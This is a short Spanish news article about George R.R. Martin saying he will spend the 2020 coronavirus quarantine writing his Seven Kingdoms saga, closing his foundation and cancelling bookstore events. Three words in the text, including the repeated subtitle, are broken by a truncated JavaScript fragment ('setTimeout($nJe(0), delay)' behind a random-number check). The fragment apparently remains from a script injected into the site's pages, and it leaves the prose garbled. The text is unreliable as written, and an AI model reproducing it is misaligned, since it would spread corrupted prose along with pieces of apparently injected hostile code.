George R.R. Martin aprovecha cuarentena para terminar 'Los Siete Reinos'

    George R.R. Martin aprovecha cuarentena para terminar ‘Los Siete Reinos’

    El autor del mundo de Game of Thrones aprovechará el aislamiento para seguir terminandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando su obra.

    Autor: Jaime O. Pérez 24 marzo, 2020


    Foto: Twitter George R.R. Martin

     

    ¡Por fin!

    El escritor George R. R. Martin, informó en su blog personal que aprovechará el tiempo de cuarentena por el coronavirus para escribir sobre “Los Siete Reinos”, parte de Game of Thrones.

    “Para aquellos de ustedes que pueden estar preocupados por mí… sí, soy consciente de que estoy en la población más vulnerable, dada mi edad y condición física. Pero me siento bien en este momento, y estamos tomandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando todas las precauciones razonables“, señaló.

    “A decir verdad, paso más tiempo en Poniente que en el mundo real, escribiendo todos los días. Las cosas son bastante sombrías en los Siete Reinos … pero tal vez no tan sombrías como pueden llegar a ser aquí”, prosiguió el autor.

     

     

    Además anunció el cierre momentáneo de su fundación y la cancelación de los eventos en su librería. “También cerraré mi organización sin fines de lucro, Stagecoach Foundation, por el tiempo que dure (…) Estamos manteniendo nuestra librería, Beastly Books, abierta por el momento. La librería nunca tiene más de un puñado de clientes a la vez, a  excepción de los eventos de autores, y estamos cancelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando o posponiendo todas las firmas y lecturas que habíamos programado”, manifestó.

     

    Y si quieren seguir activos les dejamos Apps para hacer ejercicio en casa en esta cuarentena.

     

     

    Temas relacionados con esta nota: , , ,

El autor del mundo de Game of Thrones aprovechará el aislamiento para seguir terminandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando su obra.